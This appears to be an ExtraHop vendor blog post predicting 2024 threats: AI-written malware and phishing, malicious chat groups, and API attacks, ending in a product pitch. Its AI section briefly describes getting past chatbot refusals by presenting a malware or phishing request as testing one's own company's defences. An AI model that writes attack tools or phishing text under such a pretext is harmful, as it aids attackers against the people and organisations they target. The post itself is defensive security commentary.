Blog
Cybersecurity Predictions: Generative AI, Chat Services Will Assist with Sneak Attacks
Jamie Moles
January 3, 2024
In 2024, cybersecurity practitioners should watch out for three emerging tactics threat actors are likely to take to try to sneak up on organizations:
- Attackers will increasingly turn to AI to write malware and phishing messages.
- Threat actors will deploy rogue chat programs to deliver malicious code and steal data.
- Attackers will target APIs in an effort to steal the data transmitted between applications.
A recent webinar from ExtraHop and Dark Reading featured a presentation about these three cybersecurity trends. Here are the highlights from the webinar:
Attackers Embrace AI
As many legitimate organizations begin to embrace generative AI, attackers are also experimenting with ways to use it. Shortly after ChatGPT was released in late 2022, users found ways to do all kinds of dodgy things with it. Several users demonstrated how to use ChatGPT to write new kinds of malware, including mutating code designed to evade endpoint detection and response (EDR) systems.
In the following months, ChatGPT and other popular generative AI services put filters in place to prevent users from directing them to write malware and assist with other malicious activity.
However, ChatGPT and other generative AI services can be tricked into writing attacker tools. If you ask ChatGPT to write a script to test your company’s servers for a specific vulnerability, it may comply. Attackers could use that same code.
Beyond mainstream generative AI tools like ChatGPT, threat actors also have access to several other AI applications available on the dark web for a price. These AIs, including WormGPT, have no guardrails in place to prevent threat actors from using them to write solid malware code and other hacking tools.
Attackers will also use AI to automate tasks like writing phishing emails and smishing texts. With AI, attackers can generate highly personalized phishing emails and fraudulent SMS messages, without the frequent spelling and grammatical errors that have exposed many past phishing and smishing attempts.
As with writing malware, commonly used AIs like ChatGPT and Google Bard will decline to write a phishing email, but clever attackers can work around the controls in place. If you ask ChatGPT to write an email to test your company’s anti-phishing policies, the AI will produce credible text.
Chatting with the Bad Guys
Chat server and service abuse is another type of attack that will likely grow in popularity in 2024. These attacks start with an email, text, or social media message to a victim, inviting them to join a chat group, such as a Slack channel or a Discord server.
The group chats may look legitimate and innocuous, but they can lead to serious security problems, since chat services allow users to share files, including Microsoft Word documents containing malicious macros. Moreover, browser-based chat apps bypass organizations’ perimeter controls, including firewalls, that typically let most web traffic through. This gives attackers uncontrolled access to people inside your corporate network.
In addition to allowing users to share files, chat apps typically enable users to send direct messages to each other, making it easier for attackers to engage in social engineering schemes. Chat services connected to social media sites may also ask for usernames and passwords, giving attackers a means to compromise even more information and potentially elevate their privileges.
In many cases, a good antivirus application or EDR platform will alert security teams to known malware passed through chat apps. However, attackers are constantly looking for ways to evade EDR and antivirus protections, and new or obfuscated malware may slip through.
Organizations need post-compromise protections, including network-based detection capabilities, to protect against chat-based malware.
APIs in the Crosshairs
Finally, threat actors will target vulnerabilities in APIs as a way to steal data. In some cases, APIs share user data, such as usernames and passwords, in plain text as users log into web-based applications. The exposure of a website user ID number could lead attackers to extrapolate other user ID numbers and hack their accounts.
APIs are vulnerable to several attacks, and several powerful applications available in the market allow organizations–and attackers–to monitor APIs for weaknesses.
One common API attack involves “fuzzing,” when a threat actor sends increasingly large garbage strings to a website or API in place of data it’s expecting. Fuzzing allows attackers to create buffer overflows in code, potentially causing APIs to expose sensitive data.
Meanwhile, API-related authentication breaches can happen when websites have weak authentication methods, such as usernames and passwords, or when they save a cookie that contains a session ID that attackers can steal and then use to log in.
Other common attacks against APIs and connected websites include cross site scripting, server side request forgeries, and SQL injections. Cross site scripting, for example, involves an attacker injecting malicious scripts into the code of a trusted website or application.
Reveal(x) to the Rescue
Regardless of which tactic attackers may employ, the ExtraHop Reveal(x) network detection and response platform can help organizations pick up on it. If an attacker manages to get onto your network using new AI-generated malware, by compromising a chat service, or by exploiting vulnerabilities in APIs, Reveal(x) can show you their attempts to move laterally inside the network, conduct reconnaissance, and steal data. It also detects cross site scripting, server side request forgeries, and SQL injections, among hundreds of other attack techniques. Learn more via our on-demand webinar or self-guided demo.
Share your cybersecurity predictions for 2024 in the ExtraHop Customer Community.
Discover more